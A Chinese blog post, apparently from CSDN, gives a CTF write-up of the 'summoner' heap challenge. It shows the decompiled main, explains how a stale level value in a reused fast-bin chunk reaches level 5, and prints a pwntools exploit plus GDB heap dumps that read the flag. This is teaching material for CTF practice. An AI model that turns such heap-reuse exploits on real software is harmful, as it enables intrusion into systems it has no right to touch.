pwn刷题num45----fast fit

最新推荐文章于 2024-07-17 14:55:21 发布
最新推荐文章于 2024-07-17 14:55:21 发布
阅读量216 收藏
点赞数
分类专栏: 堆利用 CTF pwn 文章标签: linux python 安全 c语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124554114
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏

github题目链接
这道题下载下来后需要先用patchel使用低版本的libc(我这里用的是libc2.23)加载运行,
具体怎么用?看这
还有这
flag也是自己设置在/pwn/flag里

fast fit思想
如果一个chunk是空闲的并且足够大(大于用户申请的chunk大小),那么申请chunk时,就会选择这个空闲的chunk在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

64位程序,小端序
开启RELRO-----got表不可写
开启canary保护-----栈溢出需绕过canary
开启NX保护-----堆栈不可执行
开启PIE----内存地址随机化
动态链接

运行一下
在这里插入图片描述
这里我翻译了一下,好像翻译的有点不对,但大体就这意思

翻过雪山后,遇到了邪恶的召唤师!他召唤出了5级的“黑魔王”!你必须越过他的尸体才能与魔龙战斗,但你只能召唤4级生物!你现在有什么打算???可用计划:
show - 显示你的生物及其等级
summon [name] - 召唤一个名为 [name] 的生物
level-up [level] - 升级你的生物(低于 5 级) 罢工 - 打击邪恶的召唤者的生物!!!
release - 释放你的生物
quit - 放弃并死
输入你的命令:
召唤一个当前的生物:“a”
输入你的命令: >
显示当前的生物:a [Level 0]
输入你的命令: > level-up Invalid command
输入你的命令: > 升级一个 升级到“0”
输入你的命令: > strike
不,你不能打败他!
输入你的命令: > release 发布。
输入您的命令: > 退出
ida看一下伪代码

有一个菜单函数
在这里插入图片描述
程序流程基本全在主函数里

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  const char *v3; // rsi
  char **v5; // [rsp+0h] [rbp-240h]
  unsigned int mylevel; // [rsp+1Ch] [rbp-224h]
  void **v7; // [rsp+20h] [rbp-220h]
  const char *name; // [rsp+28h] [rbp-218h]
  const char *nptra; // [rsp+28h] [rbp-218h]
  char s; // [rsp+30h] [rbp-210h]
  char v11; // [rsp+37h] [rbp-209h]
  _BYTE v12[7]; // [rsp+39h] [rbp-207h]
  unsigned __int64 v13; // [rsp+238h] [rbp-8h]

  v5 = a2;
  v13 = __readfsqword(0x28u);
  v3 = 0LL;
  setbuf(_bss_start, 0LL);
  sub_AF0();
  menu();
  v7 = 0LL;
  while ( 1 )
  {
    printf("\nEnter your command:\n> ", v3, v5);
    if ( !fgets(&s, 0x200, stdin) )             // 64位 small 0x20~0x400
      break;
    v3 = "show";
    if ( !strncmp(&s, "show", 4uLL) )
    {
      if ( v7 )
      {
        v3 = (const char *)*v7;
        printf("Current creature: %s [Level %u]\n", *v7, *((unsigned int *)v7 + 2));
      }
      else
      {
        puts("You have no creature now.");
      }
    }
    else
    {
      v3 = "summon";
      if ( !strncmp(&s, "summon", 6uLL) )
      {
        if ( v7 )
        {
          puts("Already have one creature. Release it first.");
        }
        else
        {
          v3 = "\n";
          name = strtok(&v11, "\n");            // nptr =  s
          if ( name )
          {
            v7 = (void **)malloc(0x10uLL);      // 动态内存分配给v7
                                                // 
            if ( !v7 )
            {
              puts("malloc() returned NULL. Out of Memory\n");
              exit(-1);
            }
            *v7 = strdup(name);                 // *v7 == *name
            v3 = name;
            printf("Current creature:\"%s\"\n", name);
          }
          else
          {
            puts("Invalid command");
          }
        }
      }
      else
      {
        v3 = "level-up";
        if ( !strncmp(&s, "level-up", 8uLL) )
        {
          if ( v7 )
          {
            v3 = "\n";
            nptra = strtok(v12, "\n");
            if ( nptra )
            {
              v3 = 0LL;
              mylevel = strtoul(nptra, 0LL, 10);
              if ( mylevel <= 4 )
              {
                *((_DWORD *)v7 + 2) = mylevel;  // v7---mem = mylevel
                v3 = (const char *)mylevel;
                printf("Level-up to \"%u\"\n", mylevel);
              }
              else
              {
                puts("Can only level-up to Level 4.");
              }
            }
            else
            {
              puts("Invalid command");
            }
          }
          else
          {
            puts("Summon first.");
          }
        }
        else
        {
          v3 = "strike";
          if ( !strncmp(&s, "strike", 6uLL) )
          {
            if ( v7 )
            {
              if ( *((_DWORD *)v7 + 2) == 5 )   // flag条件 mylevel ==5
                system("/bin/cat /pwn/flag");
              else
                puts("No, you cannot beat him!");
            }
            else
            {
              puts("Summon first.");
            }
          }
          else
          {
            v3 = "release";
            if ( !strncmp(&s, "release", 7uLL) )
            {
              if ( v7 )
              {
                free(*v7);                      // 释放内存,但未给指针v7置空,保留了原数据,v7指针的mem前8位存放姓名,后八位存放mylevel,可以通过溢出修改mylevel,free掉,再次申请内存时,mylevel默认是上次修改的值(5)
                v7 = 0LL;
                puts("Released.");
              }
              else
              {
                puts("No creature summoned.");
              }
            }
            else
            {
              v3 = "quit";
              if ( !strncmp(&s, "quit", 4uLL) )
                return 0LL;
              puts("Invalid option");
              menu();
            }
          }
        }
      }
    }
  }
  return 0LL;
}

观察程序发现创造一个怪物会建立两个chunk,第一个chunk存放怪物等级,第二个chunk存放怪物名字,
两个chunk大小(0x20字节)都是0x10(mem大小)字节

v7 = (void **)malloc(0x10uLL);      // 动态内存分配给v7
    
*v7 = strdup(name);

flag条件 mylevel ==5可以获得flag

if ( *((_DWORD *)v7 + 2) == 5 )   // flag条件 mylevel ==5
		                system("/bin/cat /pwn/flag");

·

然而由下面这段代码可知我们不能把mylecel值改为5

 if ( mylevel <= 4 )
	              {
	                *((_DWORD *)v7 + 2) = mylevel;  // v7---mem = mylevel
	                v3 = (const char *)mylevel;
	                printf("Level-up to \"%u\"\n", mylevel);
	              }
	              else
	              {
	                puts("Can only level-up to Level 4.");

思路

 free(*v7);                     
 v7 = 0LL;

释放内存,但未给指针第一个chunk指针置空,保留了原数据,只把存放name的chunk置空,*v7指针的mem前8位存放姓名,后八位存放mylevel,可以通过溢出修改mylevel,free掉,再次申请内存时,mylevel默认是上次修改的值(这里我们把等级改为5)
exp

from pwn import *
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
context(os='linux',endian='little',log_level='debug',arch='amd64')
sh = process('./summoner')
def dbg():
    gdb.attach(sh)
    pause()

sh.sendlineafter('> ','summon aaaaaaaa'+'\x05')  #申请一个chunk,溢出下一位为5

dbg() #第一个断点

sh.sendlineafter('> ','release')  #释放name的chunk

dbg()#第二个断点

sh.sendlineafter('> ','summon a') #申请一个怪物,第一个chunk就是释放的那个等级为5的chunk

dbg()#第三个断点

sh.sendlineafter('> ','strike')
sh.interactive()

运行在这里插入图片描述
在这里插入图片描述
第一个断点处,可以看到申请了两个chunk,

0x55b128748010:	0x0000000000000000	0x0000000000000021
0x55b128748020:	0x000055b128748040	0x0000000000000000 #第一个chunk,mem存放第二个chunk的地址和等级0
0x55b128748030:	0x0000000000000000	0x0000000000000021 
0x55b128748040:	0x6161616161616161	0x0000000000000005  #第二个chunk,mem存放怪物名字即多写的一个5

接着运行在这里插入图片描述

0x55b128748010:	0x0000000000000000	0x0000000000000021
0x55b128748020:	0x000055b128748040	0x0000000000000000
0x55b128748030:	0x0000000000000000	0x0000000000000021
0x55b128748040:	0x0000000000000000	0x0000000000000005

第二个断点处,可以看到free后,第一个chunk未被free,还有值,第二个chunk已经被free,name指针也置空为0
接着运行在这里插入图片描述

0x55b128748010:	0x0000000000000000	0x0000000000000021
0x55b128748020:	0x000055b128748040	0x0000000000000000 #第一次申请的chunk
0x55b128748030:	0x0000000000000000	0x0000000000000021
0x55b128748040:	0x000055b128748060	0x0000000000000005 #第二次申请的第一个chunk,使用了第一次释放的chunk,存放等级5
0x55b128748050:	0x0000000000000000	0x0000000000000021
0x55b128748060:	0x0000000000000061	0x0000000000000000 #第二次申请的第二个chunk,存放名字0x61(我们输入的a)

接着运行strike获得flag
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU pwn 刷题
qq_36495104的博客
05-19 1490
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 1124
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 654
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
CTFshow-PWN-栈溢出(pwn45
Welcome To Myon'Blog !
05-20 370
我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。system 函数属于libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的,即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。PLT用于间接调用共享库中的函数。这些方法和函数通常用于在漏洞利用过程中查找特定函数的地址(例如 system 函数)或特定字符串的地址(例如 /bin/sh 字符串)。
buuctf——pwn刷题之旅(持续更新)
qq_42988973的博客
12-16 401
buuctf-pwn 的一些wp
攻防世界:PWN刷题(一)
m0_53932372的博客
12-30 1593
cgpwn2 32bit,漏洞:栈溢出 这题很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用栈溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
PWN学习-ADworld刷题
WocW的博客
06-04 1585
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 627
babyheap
pwn刷题writeup(后续更新)
weixin_43342135的博客
08-12 1209
bugku的pwn1: 这道题没啥说的, 直接在linu下执行语句:nc 114.116.54.89 10001, 再 ls 命令展示当下目录, 然后 cat flag 读取目标文件, 一般来说是flag这个文件有flag,但是也不排除其它的地方有flag。 Bugku的pwn2: 第一步先nc上去程序,然后观看程序的作用。 传文件进入linux,再然后file pwn2,che...
Linux C | 管道open打开方式
I_feige的博客
07-12 356
1.
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
weixin_73359101的博客
07-14 1669
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
weixin_45037073的博客
07-14 1124
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
Linux中的文件夹作用
qq_36634055的博客
07-16 498
这里放的是系统管理员(超级用户)使用的特殊工具,就像是工具箱里的专业工具,比如ifconfig(网络配置)、fdisk(磁盘分区)等,普通用户一般用不到。:这个目录存放了一些基本的用户命令,就像是工具箱里常用的工具,比如ls(列出文件)、cp(复制文件)等,这些命令对于普通用户和系统管理员都是可用的。:这个目录存放了各种可变数据,包括日志文件、邮件队列、打印队列等,就像是家里放杂物的地方,随着时间的推移,里面的东西会不断变化。:这里放的是可选的软件包,就像是额外的娱乐设施,可以根据需要添加。
定制 Linux 内核的意义
最新发布
地球空间
07-17 216
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值